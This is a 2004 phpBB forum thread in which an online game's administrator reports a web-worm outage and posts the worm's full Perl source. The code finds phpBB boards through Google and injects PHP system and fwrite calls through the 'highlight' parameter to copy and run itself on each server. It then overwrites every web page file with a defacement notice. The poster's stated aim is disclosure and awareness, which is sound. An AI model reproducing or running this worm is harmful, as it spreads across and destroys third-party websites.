 |
|
| View previous topic :: View next topic |
| Author |
Message |
Maelstroem
Commander
Joined: 30 Jan 2004
Posts: 431
Location: Munich, Germany
|
 Posted: Mon Dec 20, 2004 22:19 Post subject: Web-Worm infection |
 |
|
Dear Imperators!
Evil forces of the universe have sent us a web-worm, which disabled the kosmor service for a few hours.
To remedy this situation, all relevant system services have been or are about to be upgraded to the newest version.
The problem occurs with php < 4.3.10 in conjunction with a phpbb board software.
Fortunateley, the worm only kills every server page (html, php and so on) and does no other harm.
Todays host run is suspended until tomorrow, so that all imperators can do their turn.
To show this little cute worm to the world, I have posted the worm perl code here. Looks small and pretty but is really nasty. I have also posted to debian-users linux newsgroup with my findings. Many people around the world are getting nervous *right now* 
Bye,
Maelstroem
_________________
Commander Maelstroem in the house Nemesis |
|
| Back to top |
|
 |
Maelstroem
Commander
Joined: 30 Jan 2004
Posts: 431
Location: Munich, Germany
|
| Posted: Mon Dec 20, 2004 22:25 Post subject: |
|
|
here comes the code. Perl-hackers, enjoy. (We "caught" generation 6 by the way, really on top of the stack so to say. During my fixing work, we caught generation 15, again. This little beast is really multiplicating among phpbb sites and does spread via google searches.)
I post the worm code here, because I think that information is the best thing we can do to avoid such plagues later on. For a first anti-worm measurement, it helps to move /usr/bin/perl to another place, so the worm cannot execute anymore.
| Code: |
#!/usr/bin/perl
use strict;
use Socket;
sub PayLoad();
sub DoDir($);
sub DoFile($);
sub GoGoogle();
sub GrabURL($);
sub str2chr($);
eval{ fork and exit; };
my $generation = 6;
PayLoad() if $generation > 3;
open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;
while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3) {
PayLoad() ;
} else {
exit;
}
}
$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;
my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';
while(1) {
exit if -e 'stop.it';
OUTER: for my $url (GoGoogle()) {
exit if -e 'stop.it';
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;
while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' .
str2chr($selfFileName) . ',' . str2chr('a') . '),' . str2chr($1) .
'),exit%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $portion;
next OUTER unless GrabURL($url);
}
my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) .
')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;
GrabURL($url);
}
}
sub str2chr($) {
my $s = shift;
$s =~ s/(.)/'chr(' . ord($1) . ')%252e'/seg;
$s =~ s/%252e$//;
return $s;
}
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' .
'&q=allinurl%3A+%22viewtopic.php%22+%22' .
$ts[int(rand(@ts))] . '%3D' . int(rand(30000)) . '%22&btnG=Search';
my $goo1st = GrabURL($startURL);
return unless defined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' .
'><img src=/nav_page\.gif width=16 height=26 alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo .= GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}
return @urls;
}
sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);
my $r = "GET $res HTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept: */*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}
my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;
my $answer = join '', <Server>;
close(Server);
return $answer;
}
sub DoFile($) {
my $s = q{<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>This site is defaced!!!</TITLE>
</HEAD><BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR>
<ADDRESS><b>NeverEverNoSanity WebWorm generation } . $generation .q{.</b></ADDRESS>
</BODY></HTML>
};
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}
sub DoDir($) {
my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;
local *DIR;
opendir DIR, $dir or return;
for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {
unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}
if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i
or $ent =~ /\.jsp/i or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}
closedir DIR;
}
sub PayLoad() {
my @dirs;
eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};
push(@dirs, '/');
for my $l ('A' .. 'Z') {
push(@dirs, $l . ':');
}
for my $d (@dirs) { DoDir($d); }
}
|
_________________
Commander Maelstroem in the house Nemesis |
|
| Back to top |
|
|
Maelstroem
Commander
Joined: 30 Jan 2004
Posts: 431
Location: Munich, Germany
|
| Posted: Mon Dec 20, 2004 22:55 Post subject: |
|
|
Sorry, currently maps are not working again, yet. We bashed forward in the upgrade procedure too fast and now have a problem with truetype fonts/gd/php. This is not a real problem, but i now need some sleep before I can address this thing. It was a hard day and the worm really hit at the right time
As said, one (the next) turn is suspended, so do not worry too much...
Sorry for the inconvenience,
Maelstroem
_________________
Commander Maelstroem in the house Nemesis |
|
| Back to top |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
Powered by phpBB © 2001, 2002 phpBB Group
|
Imprint
Search
Log in
Memberlist
Profile
